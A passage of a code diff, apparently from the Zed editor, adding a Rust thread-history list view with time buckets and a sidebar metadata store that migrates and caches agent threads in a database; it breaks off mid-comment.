+ fn search_produced_no_matches(&self) -> bool {
+ self.visible_items.is_empty() && !self.search_query.is_empty()
+ }
+
+ fn selected_history_entry(&self) -> Option<&AgentSessionInfo> {
+ self.get_history_entry(self.selected_index)
+ }
+
+ fn get_history_entry(&self, visible_items_ix: usize) -> Option<&AgentSessionInfo> {
+ self.visible_items.get(visible_items_ix)?.history_entry()
+ }
+
+ fn set_selected_index(&mut self, mut index: usize, bias: Bias, cx: &mut Context<Self>) {
+ if self.visible_items.len() == 0 {
+ self.selected_index = 0;
+ return;
+ }
+ while matches!(
+ self.visible_items.get(index),
+ None | Some(ListItemType::BucketSeparator(..))
+ ) {
+ index = match bias {
+ Bias::Left => {
+ if index == 0 {
+ self.visible_items.len() - 1
+ } else {
+ index - 1
+ }
+ }
+ Bias::Right => {
+ if index >= self.visible_items.len() - 1 {
+ 0
+ } else {
+ index + 1
+ }
+ }
+ };
+ }
+ self.selected_index = index;
+ self.scroll_handle
+ .scroll_to_item(index, ScrollStrategy::Top);
+ cx.notify()
+ }
+
+ fn select_previous(
+ &mut self,
+ _: &menu::SelectPrevious,
+ _window: &mut Window,
+ cx: &mut Context<Self>,
+ ) {
+ if self.selected_index == 0 {
+ self.set_selected_index(self.visible_items.len() - 1, Bias::Left, cx);
+ } else {
+ self.set_selected_index(self.selected_index - 1, Bias::Left, cx);
+ }
+ }
+
+ fn select_next(&mut self, _: &menu::SelectNext, _window: &mut Window, cx: &mut Context<Self>) {
+ if self.selected_index == self.visible_items.len() - 1 {
+ self.set_selected_index(0, Bias::Right, cx);
+ } else {
+ self.set_selected_index(self.selected_index + 1, Bias::Right, cx);
+ }
+ }
+
+ fn select_first(
+ &mut self,
+ _: &menu::SelectFirst,
+ _window: &mut Window,
+ cx: &mut Context<Self>,
+ ) {
+ self.set_selected_index(0, Bias::Right, cx);
+ }
+
+ fn select_last(&mut self, _: &menu::SelectLast, _window: &mut Window, cx: &mut Context<Self>) {
+ self.set_selected_index(self.visible_items.len() - 1, Bias::Left, cx);
+ }
+
+ fn confirm(&mut self, _: &menu::Confirm, _window: &mut Window, cx: &mut Context<Self>) {
+ self.confirm_entry(self.selected_index, cx);
+ }
+
+ fn confirm_entry(&mut self, ix: usize, cx: &mut Context<Self>) {
+ let Some(entry) = self.get_history_entry(ix) else {
+ return;
+ };
+ cx.emit(ThreadHistoryViewEvent::Open(entry.clone()));
+ }
+
+ fn remove_selected_thread(
+ &mut self,
+ _: &RemoveSelectedThread,
+ _window: &mut Window,
+ cx: &mut Context<Self>,
+ ) {
+ self.remove_thread(self.selected_index, cx)
+ }
+
+ fn remove_thread(&mut self, visible_item_ix: usize, cx: &mut Context<Self>) {
+ let Some(entry) = self.get_history_entry(visible_item_ix) else {
+ return;
+ };
+ if !self.history.read(cx).supports_delete() {
+ return;
+ }
+ let session_id = entry.session_id.clone();
+ self.history.update(cx, |history, cx| {
+ history
+ .delete_session(&session_id, cx)
+ .detach_and_log_err(cx);
+ });
+ }
+
+ fn remove_history(&mut self, _window: &mut Window, cx: &mut Context<Self>) {
+ if !self.history.read(cx).supports_delete() {
+ return;
+ }
+ self.history.update(cx, |history, cx| {
+ history.delete_sessions(cx).detach_and_log_err(cx);
+ });
+ self.confirming_delete_history = false;
+ cx.notify();
+ }
+
+ fn prompt_delete_history(&mut self, _window: &mut Window, cx: &mut Context<Self>) {
+ self.confirming_delete_history = true;
+ cx.notify();
+ }
+
+ fn cancel_delete_history(&mut self, _window: &mut Window, cx: &mut Context<Self>) {
+ self.confirming_delete_history = false;
+ cx.notify();
+ }
+
+ fn render_list_items(
+ &mut self,
+ range: Range<usize>,
+ _window: &mut Window,
+ cx: &mut Context<Self>,
+ ) -> Vec<AnyElement> {
+ self.visible_items
+ .get(range.clone())
+ .into_iter()
+ .flatten()
+ .enumerate()
+ .map(|(ix, item)| self.render_list_item(item, range.start + ix, cx))
+ .collect()
+ }
+
+ fn render_list_item(&self, item: &ListItemType, ix: usize, cx: &Context<Self>) -> AnyElement {
+ match item {
+ ListItemType::Entry { entry, format } => self
+ .render_history_entry(entry, *format, ix, Vec::default(), cx)
+ .into_any(),
+ ListItemType::SearchResult { entry, positions } => self.render_history_entry(
+ entry,
+ EntryTimeFormat::DateAndTime,
+ ix,
+ positions.clone(),
+ cx,
+ ),
+ ListItemType::BucketSeparator(bucket) => div()
+ .px(DynamicSpacing::Base06.rems(cx))
+ .pt_2()
+ .pb_1()
+ .child(
+ Label::new(bucket.to_string())
+ .size(LabelSize::XSmall)
+ .color(Color::Muted),
+ )
+ .into_any_element(),
+ }
+ }
+
+ fn render_history_entry(
+ &self,
+ entry: &AgentSessionInfo,
+ format: EntryTimeFormat,
+ ix: usize,
+ highlight_positions: Vec<usize>,
+ cx: &Context<Self>,
+ ) -> AnyElement {
+ let selected = ix == self.selected_index;
+ let hovered = Some(ix) == self.hovered_index;
+ let entry_time = entry.updated_at;
+ let display_text = match (format, entry_time) {
+ (EntryTimeFormat::DateAndTime, Some(entry_time)) => {
+ let now = Utc::now();
+ let duration = now.signed_duration_since(entry_time);
+ let days = duration.num_days();
+
+ format!("{}d", days)
+ }
+ (EntryTimeFormat::TimeOnly, Some(entry_time)) => {
+ format.format_timestamp(entry_time.timestamp(), self.local_timezone)
+ }
+ (_, None) => "—".to_string(),
+ };
+
+ let title = thread_title(entry);
+ let full_date = entry_time
+ .map(|time| {
+ EntryTimeFormat::DateAndTime.format_timestamp(time.timestamp(), self.local_timezone)
+ })
+ .unwrap_or_else(|| "Unknown".to_string());
+
+ let supports_delete = self.history.read(cx).supports_delete();
+
+ h_flex()
+ .w_full()
+ .pb_1()
+ .child(
+ ListItem::new(ix)
+ .rounded()
+ .toggle_state(selected)
+ .spacing(ListItemSpacing::Sparse)
+ .start_slot(
+ h_flex()
+ .w_full()
+ .gap_2()
+ .justify_between()
+ .child(
+ HighlightedLabel::new(thread_title(entry), highlight_positions)
+ .size(LabelSize::Small)
+ .truncate(),
+ )
+ .child(
+ Label::new(display_text)
+ .color(Color::Muted)
+ .size(LabelSize::XSmall),
+ ),
+ )
+ .tooltip(move |_, cx| {
+ Tooltip::with_meta(title.clone(), None, full_date.clone(), cx)
+ })
+ .on_hover(cx.listener(move |this, is_hovered, _window, cx| {
+ if *is_hovered {
+ this.hovered_index = Some(ix);
+ } else if this.hovered_index == Some(ix) {
+ this.hovered_index = None;
+ }
+
+ cx.notify();
+ }))
+ .end_slot::<IconButton>(if hovered && supports_delete {
+ Some(
+ IconButton::new("delete", IconName::Trash)
+ .shape(IconButtonShape::Square)
+ .icon_size(IconSize::XSmall)
+ .icon_color(Color::Muted)
+ .tooltip(move |_window, cx| {
+ Tooltip::for_action("Delete", &RemoveSelectedThread, cx)
+ })
+ .on_click(cx.listener(move |this, _, _, cx| {
+ this.remove_thread(ix, cx);
+ cx.stop_propagation()
+ })),
+ )
+ } else {
+ None
+ })
+ .on_click(cx.listener(move |this, _, _, cx| this.confirm_entry(ix, cx))),
+ )
+ .into_any_element()
+ }
+}
+
+impl Focusable for ThreadHistoryView {
+ fn focus_handle(&self, cx: &App) -> FocusHandle {
+ self.search_editor.focus_handle(cx)
+ }
+}
+
+impl Render for ThreadHistoryView {
+ fn render(&mut self, window: &mut Window, cx: &mut Context<Self>) -> impl IntoElement {
+ let has_no_history = self.history.read(cx).is_empty();
+ let supports_delete = self.history.read(cx).supports_delete();
+
+ v_flex()
+ .key_context("ThreadHistory")
+ .size_full()
+ .bg(cx.theme().colors().panel_background)
+ .on_action(cx.listener(Self::select_previous))
+ .on_action(cx.listener(Self::select_next))
+ .on_action(cx.listener(Self::select_first))
+ .on_action(cx.listener(Self::select_last))
+ .on_action(cx.listener(Self::confirm))
+ .on_action(cx.listener(Self::remove_selected_thread))
+ .on_action(cx.listener(|this, _: &RemoveHistory, window, cx| {
+ this.remove_history(window, cx);
+ }))
+ .child(
+ h_flex()
+ .h(Tab::container_height(cx))
+ .w_full()
+ .py_1()
+ .px_2()
+ .gap_2()
+ .justify_between()
+ .border_b_1()
+ .border_color(cx.theme().colors().border)
+ .child(
+ Icon::new(IconName::MagnifyingGlass)
+ .color(Color::Muted)
+ .size(IconSize::Small),
+ )
+ .child(self.search_editor.clone()),
+ )
+ .child({
+ let view = v_flex()
+ .id("list-container")
+ .relative()
+ .overflow_hidden()
+ .flex_grow();
+
+ if has_no_history {
+ view.justify_center().items_center().child(
+ Label::new("You don't have any past threads yet.")
+ .size(LabelSize::Small)
+ .color(Color::Muted),
+ )
+ } else if self.search_produced_no_matches() {
+ view.justify_center()
+ .items_center()
+ .child(Label::new("No threads match your search.").size(LabelSize::Small))
+ } else {
+ view.child(
+ uniform_list(
+ "thread-history",
+ self.visible_items.len(),
+ cx.processor(|this, range: Range<usize>, window, cx| {
+ this.render_list_items(range, window, cx)
+ }),
+ )
+ .p_1()
+ .pr_4()
+ .track_scroll(&self.scroll_handle)
+ .flex_grow(),
+ )
+ .vertical_scrollbar_for(&self.scroll_handle, window, cx)
+ }
+ })
+ .when(!has_no_history && supports_delete, |this| {
+ this.child(
+ h_flex()
+ .p_2()
+ .border_t_1()
+ .border_color(cx.theme().colors().border_variant)
+ .when(!self.confirming_delete_history, |this| {
+ this.child(
+ Button::new("delete_history", "Delete All History")
+ .full_width()
+ .style(ButtonStyle::Outlined)
+ .label_size(LabelSize::Small)
+ .on_click(cx.listener(|this, _, window, cx| {
+ this.prompt_delete_history(window, cx);
+ })),
+ )
+ })
+ .when(self.confirming_delete_history, |this| {
+ this.w_full()
+ .gap_2()
+ .flex_wrap()
+ .justify_between()
+ .child(
+ h_flex()
+ .flex_wrap()
+ .gap_1()
+ .child(
+ Label::new("Delete all threads?")
+ .size(LabelSize::Small),
+ )
+ .child(
+ Label::new("You won't be able to recover them later.")
+ .size(LabelSize::Small)
+ .color(Color::Muted),
+ ),
+ )
+ .child(
+ h_flex()
+ .gap_1()
+ .child(
+ Button::new("cancel_delete", "Cancel")
+ .label_size(LabelSize::Small)
+ .on_click(cx.listener(|this, _, window, cx| {
+ this.cancel_delete_history(window, cx);
+ })),
+ )
+ .child(
+ Button::new("confirm_delete", "Delete")
+ .style(ButtonStyle::Tinted(ui::TintColor::Error))
+ .color(Color::Error)
+ .label_size(LabelSize::Small)
+ .on_click(cx.listener(|_, _, window, cx| {
+ window.dispatch_action(
+ Box::new(RemoveHistory),
+ cx,
+ );
+ })),
+ ),
+ )
+ }),
+ )
+ })
+ }
+}
+
+/// A single row in the thread-history list: thread title on the left, a
+/// relative timestamp on the right, plus a delete button while hovered or
+/// selected (see the `RenderOnce` impl below).
+#[derive(IntoElement)]
+pub struct HistoryEntryElement {
+    // Metadata for the thread this row represents.
+    entry: AgentSessionInfo,
+    // Weak handle back to the owning view; used by the click/delete handlers.
+    conversation_view: WeakEntity<ConversationView>,
+    // Whether this row is the keyboard-selected entry.
+    selected: bool,
+    // Whether the pointer is currently over this row (tracked by the parent).
+    hovered: bool,
+    // When false, the trash button is never rendered.
+    supports_delete: bool,
+    // Invoked when the row's hover state changes; defaults to a no-op.
+    on_hover: Box<dyn Fn(&bool, &mut Window, &mut App) + 'static>,
+}
+
+impl HistoryEntryElement {
+    /// Create a row for `entry`: unselected, unhovered, deletion disabled,
+    /// and a no-op hover callback.
+    pub fn new(entry: AgentSessionInfo, conversation_view: WeakEntity<ConversationView>) -> Self {
+        Self {
+            entry,
+            conversation_view,
+            selected: false,
+            hovered: false,
+            supports_delete: false,
+            on_hover: Box::new(|_, _, _| {}),
+        }
+    }
+
+    /// Builder: whether the delete (trash) button may be shown for this row.
+    pub fn supports_delete(mut self, supports_delete: bool) -> Self {
+        self.supports_delete = supports_delete;
+        self
+    }
+
+    /// Builder: externally-tracked hover state for this row.
+    pub fn hovered(mut self, hovered: bool) -> Self {
+        self.hovered = hovered;
+        self
+    }
+
+    /// Builder: callback invoked when the row's hover state changes.
+    pub fn on_hover(mut self, on_hover: impl Fn(&bool, &mut Window, &mut App) + 'static) -> Self {
+        self.on_hover = Box::new(on_hover);
+        self
+    }
+}
+
+impl RenderOnce for HistoryEntryElement {
+    /// Render the row as a `ListItem`; clicking it loads the thread via the
+    /// agent panel, hovering reveals the delete button (when supported).
+    fn render(self, _window: &mut Window, _cx: &mut App) -> impl IntoElement {
+        let id = ElementId::Name(self.entry.session_id.0.clone().into());
+        let title = thread_title(&self.entry);
+        // Coarse relative age; threads without a timestamp show "Unknown".
+        let formatted_time = self
+            .entry
+            .updated_at
+            .map(|timestamp| {
+                let now = chrono::Utc::now();
+                let duration = now.signed_duration_since(timestamp);
+
+                // NOTE(review): days render as "2d" while hours/minutes render
+                // with an "ago" suffix ("3h ago") — confirm this inconsistency
+                // is intentional.
+                if duration.num_days() > 0 {
+                    format!("{}d", duration.num_days())
+                } else if duration.num_hours() > 0 {
+                    format!("{}h ago", duration.num_hours())
+                } else if duration.num_minutes() > 0 {
+                    format!("{}m ago", duration.num_minutes())
+                } else {
+                    "Just now".to_string()
+                }
+            })
+            .unwrap_or_else(|| "Unknown".to_string());
+
+        ListItem::new(id)
+            .rounded()
+            .toggle_state(self.selected)
+            .spacing(ListItemSpacing::Sparse)
+            .start_slot(
+                h_flex()
+                    .w_full()
+                    .gap_2()
+                    .justify_between()
+                    .child(Label::new(title).size(LabelSize::Small).truncate())
+                    .child(
+                        Label::new(formatted_time)
+                            .color(Color::Muted)
+                            .size(LabelSize::XSmall),
+                    ),
+            )
+            .on_hover(self.on_hover)
+            // The trash button only exists while hovered or selected, and only
+            // when deletion is supported by the agent.
+            .end_slot::<IconButton>(if (self.hovered || self.selected) && self.supports_delete {
+                Some(
+                    IconButton::new("delete", IconName::Trash)
+                        .shape(IconButtonShape::Square)
+                        .icon_size(IconSize::XSmall)
+                        .icon_color(Color::Muted)
+                        .tooltip(move |_window, cx| {
+                            Tooltip::for_action("Delete", &RemoveSelectedThread, cx)
+                        })
+                        .on_click({
+                            let conversation_view = self.conversation_view.clone();
+                            let session_id = self.entry.session_id.clone();
+
+                            move |_event, _window, cx| {
+                                if let Some(conversation_view) = conversation_view.upgrade() {
+                                    conversation_view.update(cx, |conversation_view, cx| {
+                                        conversation_view.delete_history_entry(&session_id, cx);
+                                    });
+                                }
+                            }
+                        }),
+                )
+            } else {
+                None
+            })
+            .on_click({
+                let conversation_view = self.conversation_view.clone();
+                let entry = self.entry;
+
+                // Route the click through the agent panel so the thread is
+                // loaded with the currently-selected agent.
+                move |_event, window, cx| {
+                    if let Some(workspace) = conversation_view
+                        .upgrade()
+                        .and_then(|view| view.read(cx).workspace().upgrade())
+                    {
+                        if let Some(panel) = workspace.read(cx).panel::<AgentPanel>(cx) {
+                            panel.update(cx, |panel, cx| {
+                                if let Some(agent) = panel.selected_agent() {
+                                    panel.load_agent_thread(
+                                        agent,
+                                        entry.session_id.clone(),
+                                        entry.work_dirs.clone(),
+                                        entry.title.clone(),
+                                        true,
+                                        window,
+                                        cx,
+                                    );
+                                }
+                            });
+                        }
+                    }
+                }
+            })
+    }
+}
+
+/// How a history entry's timestamp is rendered.
+#[derive(Clone, Copy)]
+pub enum EntryTimeFormat {
+    /// Date plus time — used for buckets older than yesterday (see
+    /// `From<TimeBucket>` below).
+    DateAndTime,
+    /// Time of day only — used for today's and yesterday's entries.
+    TimeOnly,
+}
+
+impl EntryTimeFormat {
+    /// Format a unix timestamp (seconds) for display in the given timezone.
+    ///
+    /// NOTE(review): the `unwrap` panics if `timestamp` falls outside the
+    /// range `OffsetDateTime` supports — fine for trusted stored values, but
+    /// confirm callers never pass arbitrary input.
+    fn format_timestamp(&self, timestamp: i64, timezone: UtcOffset) -> String {
+        let timestamp = OffsetDateTime::from_unix_timestamp(timestamp).unwrap();
+
+        match self {
+            EntryTimeFormat::DateAndTime => time_format::format_localized_timestamp(
+                timestamp,
+                OffsetDateTime::now_utc(),
+                timezone,
+                time_format::TimestampFormat::EnhancedAbsolute,
+            ),
+            EntryTimeFormat::TimeOnly => time_format::format_time(timestamp.to_offset(timezone)),
+        }
+    }
+}
+
+impl From<TimeBucket> for EntryTimeFormat {
+    /// Recent buckets (today/yesterday) only need a time of day; anything
+    /// older also needs the date to be unambiguous.
+    fn from(bucket: TimeBucket) -> Self {
+        match bucket {
+            TimeBucket::Today | TimeBucket::Yesterday => EntryTimeFormat::TimeOnly,
+            TimeBucket::ThisWeek | TimeBucket::PastWeek | TimeBucket::All => {
+                EntryTimeFormat::DateAndTime
+            }
+        }
+    }
+}
+
+/// Relative-age buckets used to group and label history entries.
+#[derive(PartialEq, Eq, Clone, Copy, Debug)]
+enum TimeBucket {
+    Today,
+    Yesterday,
+    /// Same ISO week as today (excluding today/yesterday).
+    ThisWeek,
+    /// The ISO week immediately before this one.
+    PastWeek,
+    /// Everything older.
+    All,
+}
+
+impl TimeBucket {
+    /// Classify `date` relative to `reference` (typically today's date),
+    /// checking the most specific bucket first.
+    fn from_dates(reference: NaiveDate, date: NaiveDate) -> Self {
+        let yesterday = reference - TimeDelta::days(1);
+        let previous_week = (reference - TimeDelta::days(7)).iso_week();
+
+        if date == reference {
+            TimeBucket::Today
+        } else if date == yesterday {
+            TimeBucket::Yesterday
+        } else if date.iso_week() == reference.iso_week() {
+            TimeBucket::ThisWeek
+        } else if date.iso_week() == previous_week {
+            TimeBucket::PastWeek
+        } else {
+            TimeBucket::All
+        }
+    }
+}
+
+impl Display for TimeBucket {
+    /// Human-readable section heading for the history list.
+    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
+        let label = match self {
+            TimeBucket::Today => "Today",
+            TimeBucket::Yesterday => "Yesterday",
+            TimeBucket::ThisWeek => "This Week",
+            TimeBucket::PastWeek => "Past Week",
+            TimeBucket::All => "All",
+        };
+        write!(f, "{label}")
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use chrono::NaiveDate;
+
+    // 2025-01-15 is a Wednesday, so the ISO-week boundaries exercised below
+    // (same week, previous week, older) are unambiguous.
+    #[test]
+    fn test_time_bucket_from_dates() {
+        let today = NaiveDate::from_ymd_opt(2025, 1, 15).unwrap();
+
+        assert_eq!(TimeBucket::from_dates(today, today), TimeBucket::Today);
+
+        let yesterday = NaiveDate::from_ymd_opt(2025, 1, 14).unwrap();
+        assert_eq!(
+            TimeBucket::from_dates(today, yesterday),
+            TimeBucket::Yesterday
+        );
+
+        let this_week = NaiveDate::from_ymd_opt(2025, 1, 13).unwrap();
+        assert_eq!(
+            TimeBucket::from_dates(today, this_week),
+            TimeBucket::ThisWeek
+        );
+
+        let past_week = NaiveDate::from_ymd_opt(2025, 1, 7).unwrap();
+        assert_eq!(
+            TimeBucket::from_dates(today, past_week),
+            TimeBucket::PastWeek
+        );
+
+        let old = NaiveDate::from_ymd_opt(2024, 12, 1).unwrap();
+        assert_eq!(TimeBucket::from_dates(today, old), TimeBucket::All);
+    }
+}
@@ -0,0 +1,1038 @@
+use std::{path::Path, sync::Arc};
+
+use acp_thread::AgentSessionInfo;
+use agent::{ThreadStore, ZED_AGENT_ID};
+use agent_client_protocol as acp;
+use anyhow::{Context as _, Result};
+use chrono::{DateTime, Utc};
+use collections::HashMap;
+use db::{
+ sqlez::{
+ bindable::Column, domain::Domain, statement::Statement,
+ thread_safe_connection::ThreadSafeConnection,
+ },
+ sqlez_macros::sql,
+};
+use feature_flags::{AgentV2FeatureFlag, FeatureFlagAppExt};
+use futures::{FutureExt as _, future::Shared};
+use gpui::{AppContext as _, Entity, Global, Subscription, Task};
+use project::AgentId;
+use ui::{App, Context, SharedString};
+use util::ResultExt as _;
+use workspace::PathList;
+
+use crate::DEFAULT_THREAD_TITLE;
+
+/// Register the sidebar metadata store and, when the Agent V2 flag is (or
+/// later becomes) enabled, migrate legacy thread metadata into it.
+pub fn init(cx: &mut App) {
+    SidebarThreadMetadataStore::init_global(cx);
+
+    if cx.has_flag::<AgentV2FeatureFlag>() {
+        migrate_thread_metadata(cx);
+    }
+    // Also react to the flag flipping on during this session; the migration
+    // itself is guarded by `db.is_empty()` so it only runs once.
+    cx.observe_flag::<AgentV2FeatureFlag, _>(|has_flag, cx| {
+        if has_flag {
+            migrate_thread_metadata(cx);
+        }
+    })
+    .detach();
+}
+
+/// Migrate existing thread metadata from native agent thread store to the new metadata storage.
+/// We migrate the last 10 threads per project and skip threads that do not have a project.
+///
+/// TODO: Remove this after N weeks of shipping the sidebar
+fn migrate_thread_metadata(cx: &mut App) {
+    const MAX_MIGRATED_THREADS_PER_PROJECT: usize = 10;
+
+    let store = SidebarThreadMetadataStore::global(cx);
+    let db = store.read(cx).db.clone();
+
+    cx.spawn(async move |cx| {
+        // Idempotence guard: only migrate into an empty database.
+        if !db.is_empty()? {
+            return Ok::<(), anyhow::Error>(());
+        }
+
+        let metadata = store.read_with(cx, |_store, app| {
+            // Per-project counters enforcing the 10-thread cap. Relies on
+            // `entries()` yielding newest-first so the cap keeps recent threads.
+            let mut migrated_threads_per_project = HashMap::default();
+
+            ThreadStore::global(app)
+                .read(app)
+                .entries()
+                .filter_map(|entry| {
+                    // Projectless threads are intentionally skipped.
+                    if entry.folder_paths.is_empty() {
+                        return None;
+                    }
+
+                    let migrated_thread_count = migrated_threads_per_project
+                        .entry(entry.folder_paths.clone())
+                        .or_insert(0);
+                    if *migrated_thread_count >= MAX_MIGRATED_THREADS_PER_PROJECT {
+                        return None;
+                    }
+                    *migrated_thread_count += 1;
+
+                    // Native threads carry no agent id.
+                    Some(ThreadMetadata {
+                        session_id: entry.id,
+                        agent_id: None,
+                        title: entry.title,
+                        updated_at: entry.updated_at,
+                        created_at: entry.created_at,
+                        folder_paths: entry.folder_paths,
+                    })
+                })
+                .collect::<Vec<_>>()
+        });
+
+        log::info!("Migrating {} thread store entries", metadata.len());
+
+        // Manually save each entry to the database and call reload, otherwise
+        // we'll end up triggering lots of reloads after each save
+        for entry in metadata {
+            db.save(entry).await?;
+        }
+
+        log::info!("Finished migrating thread store entries");
+
+        let _ = store.update(cx, |store, cx| store.reload(cx));
+        Ok(())
+    })
+    .detach_and_log_err(cx);
+}
+
+/// Newtype wrapper so the store entity can be registered as a gpui global.
+struct GlobalThreadMetadataStore(Entity<SidebarThreadMetadataStore>);
+impl Global for GlobalThreadMetadataStore {}
+
+/// Lightweight metadata for any thread (native or ACP), enough to populate
+/// the sidebar list and route to the correct load path when clicked.
+#[derive(Debug, Clone)]
+pub struct ThreadMetadata {
+    pub session_id: acp::SessionId,
+    /// `None` for native Zed threads, `Some("claude-code")` etc. for ACP agents.
+    pub agent_id: Option<AgentId>,
+    pub title: SharedString,
+    /// Last-activity time; rows are listed newest-first by this value.
+    pub updated_at: DateTime<Utc>,
+    /// Nullable in the DB schema (`created_at TEXT`), so `None` is possible.
+    pub created_at: Option<DateTime<Utc>>,
+    /// Worktree roots the thread was opened against; used for per-project filtering.
+    pub folder_paths: PathList,
+}
+
+impl ThreadMetadata {
+    /// Build metadata from an agent-reported session summary.
+    ///
+    /// Missing timestamps fall back to "now", and the native Zed agent is
+    /// normalized to `agent_id: None`.
+    pub fn from_session_info(agent_id: AgentId, session: &AgentSessionInfo) -> Self {
+        let session_id = session.session_id.clone();
+        let title = session.title.clone().unwrap_or_default();
+        // `Utc::now` passed directly — no closure needed (clippy: redundant_closure).
+        let updated_at = session.updated_at.unwrap_or_else(Utc::now);
+        let created_at = session.created_at.unwrap_or(updated_at);
+        let folder_paths = session.work_dirs.clone().unwrap_or_default();
+        let agent_id = if agent_id.as_ref() == ZED_AGENT_ID.as_ref() {
+            None
+        } else {
+            Some(agent_id)
+        };
+        Self {
+            session_id,
+            agent_id,
+            title,
+            updated_at,
+            created_at: Some(created_at),
+            folder_paths,
+        }
+    }
+
+    /// Build metadata from a live `AcpThread`, stamping `updated_at` with the
+    /// current time and deriving `folder_paths` from the project's visible
+    /// worktrees.
+    pub fn from_thread(thread: &Entity<acp_thread::AcpThread>, cx: &App) -> Self {
+        let thread_ref = thread.read(cx);
+        let session_id = thread_ref.session_id().clone();
+        let title = thread_ref
+            .title()
+            .unwrap_or_else(|| DEFAULT_THREAD_TITLE.into());
+        let updated_at = Utc::now();
+
+        let agent_id = thread_ref.connection().agent_id();
+
+        // Normalize the native agent to `None`, mirroring `from_session_info`.
+        let agent_id = if agent_id.as_ref() == ZED_AGENT_ID.as_ref() {
+            None
+        } else {
+            Some(agent_id)
+        };
+
+        let folder_paths = {
+            let project = thread_ref.project().read(cx);
+            let paths: Vec<Arc<Path>> = project
+                .visible_worktrees(cx)
+                .map(|worktree| worktree.read(cx).abs_path())
+                .collect();
+            PathList::new(&paths)
+        };
+
+        Self {
+            session_id,
+            agent_id,
+            title,
+            created_at: Some(updated_at), // handled by db `ON CONFLICT`
+            updated_at,
+            folder_paths,
+        }
+    }
+}
+
+/// The store holds all metadata needed to show threads in the sidebar.
+/// Effectively, all threads stored in here are "non-archived".
+///
+/// Automatically listens to AcpThread events and updates metadata if it has changed.
+pub struct SidebarThreadMetadataStore {
+    // Persistent backing store; all reads/writes go through this.
+    db: ThreadMetadataDb,
+    // In-memory cache of all rows, newest-first (populated by `reload`).
+    threads: Vec<ThreadMetadata>,
+    // The same rows indexed by worktree paths for per-project queries.
+    threads_by_paths: HashMap<PathList, Vec<ThreadMetadata>>,
+    // In-flight cache refresh; `Shared` so concurrent callers can await it.
+    reload_task: Option<Shared<Task<()>>>,
+    // Keeps per-session event subscriptions alive; pruned on thread release.
+    session_subscriptions: HashMap<acp::SessionId, Subscription>,
+}
+
+impl SidebarThreadMetadataStore {
+    /// Install the store as a global, backed by the on-disk database.
+    /// Idempotent: does nothing if the global is already registered.
+    #[cfg(not(any(test, feature = "test-support")))]
+    pub fn init_global(cx: &mut App) {
+        // Fix: guard against the global that is actually set below. The
+        // previous check (`has_global::<Self>()`) tested a type that is never
+        // registered directly, so repeated calls rebuilt and replaced the
+        // store (dropping its caches and subscriptions).
+        if cx.has_global::<GlobalThreadMetadataStore>() {
+            return;
+        }
+
+        let db = ThreadMetadataDb::global(cx);
+        let thread_store = cx.new(|cx| Self::new(db, cx));
+        cx.set_global(GlobalThreadMetadataStore(thread_store));
+    }
+
+    /// Test variant: opens an isolated, per-test database so parallel tests
+    /// don't share state. Always (re)registers the global.
+    #[cfg(any(test, feature = "test-support"))]
+    pub fn init_global(cx: &mut App) {
+        let thread = std::thread::current();
+        let test_name = thread.name().unwrap_or("unknown_test");
+        let db_name = format!("THREAD_METADATA_DB_{}", test_name);
+        let db = smol::block_on(db::open_test_db::<ThreadMetadataDb>(&db_name));
+        let thread_store = cx.new(|cx| Self::new(ThreadMetadataDb(db), cx));
+        cx.set_global(GlobalThreadMetadataStore(thread_store));
+    }
+
+    /// The global store, or `None` if `init_global` hasn't run yet.
+    pub fn try_global(cx: &App) -> Option<Entity<Self>> {
+        cx.try_global::<GlobalThreadMetadataStore>()
+            .map(|store| store.0.clone())
+    }
+
+    /// The global store; panics if `init_global` hasn't run.
+    pub fn global(cx: &App) -> Entity<Self> {
+        cx.global::<GlobalThreadMetadataStore>().0.clone()
+    }
+
+    pub fn is_empty(&self) -> bool {
+        self.threads.is_empty()
+    }
+
+    /// All cached entries, newest first.
+    pub fn entries(&self) -> impl Iterator<Item = ThreadMetadata> + '_ {
+        self.threads.iter().cloned()
+    }
+
+    pub fn entry_ids(&self) -> impl Iterator<Item = acp::SessionId> + '_ {
+        self.threads.iter().map(|thread| thread.session_id.clone())
+    }
+
+    /// Cached entries whose worktree paths exactly match `path_list`.
+    pub fn entries_for_path(
+        &self,
+        path_list: &PathList,
+    ) -> impl Iterator<Item = ThreadMetadata> + '_ {
+        self.threads_by_paths
+            .get(path_list)
+            .into_iter()
+            .flatten()
+            .cloned()
+    }
+
+    /// Refresh the in-memory caches from the database. Drops any reload that
+    /// is already in flight; the returned task is shared so multiple callers
+    /// can await the same refresh.
+    fn reload(&mut self, cx: &mut Context<Self>) -> Shared<Task<()>> {
+        let db = self.db.clone();
+        self.reload_task.take();
+
+        let list_task = cx
+            .background_spawn(async move { db.list().context("Failed to fetch sidebar metadata") });
+
+        let reload_task = cx
+            .spawn(async move |this, cx| {
+                let Some(rows) = list_task.await.log_err() else {
+                    return;
+                };
+
+                this.update(cx, |this, cx| {
+                    this.threads.clear();
+                    this.threads_by_paths.clear();
+
+                    // Rows arrive ordered `updated_at DESC` (see `list`), so
+                    // both caches end up newest-first.
+                    for row in rows {
+                        this.threads_by_paths
+                            .entry(row.folder_paths.clone())
+                            .or_default()
+                            .push(row.clone());
+                        this.threads.push(row);
+                    }
+
+                    cx.notify();
+                })
+                .ok();
+            })
+            .shared();
+        self.reload_task = Some(reload_task.clone());
+        reload_task
+    }
+
+    /// Upsert `metadata` into the database, then refresh the caches.
+    /// No-op unless the Agent V2 feature flag is enabled.
+    pub fn save(&mut self, metadata: ThreadMetadata, cx: &mut Context<Self>) -> Task<Result<()>> {
+        if !cx.has_flag::<AgentV2FeatureFlag>() {
+            return Task::ready(Ok(()));
+        }
+
+        let db = self.db.clone();
+        cx.spawn(async move |this, cx| {
+            db.save(metadata).await?;
+            let reload_task = this.update(cx, |this, cx| this.reload(cx))?;
+            reload_task.await;
+            Ok(())
+        })
+    }
+
+    /// Delete one thread's metadata, then refresh the caches.
+    /// No-op unless the Agent V2 feature flag is enabled.
+    pub fn delete(
+        &mut self,
+        session_id: acp::SessionId,
+        cx: &mut Context<Self>,
+    ) -> Task<Result<()>> {
+        if !cx.has_flag::<AgentV2FeatureFlag>() {
+            return Task::ready(Ok(()));
+        }
+
+        let db = self.db.clone();
+        cx.spawn(async move |this, cx| {
+            db.delete(session_id).await?;
+            let reload_task = this.update(cx, |this, cx| this.reload(cx))?;
+            reload_task.await;
+            Ok(())
+        })
+    }
+
+    /// Build the store, kick off the initial cache load, and start watching
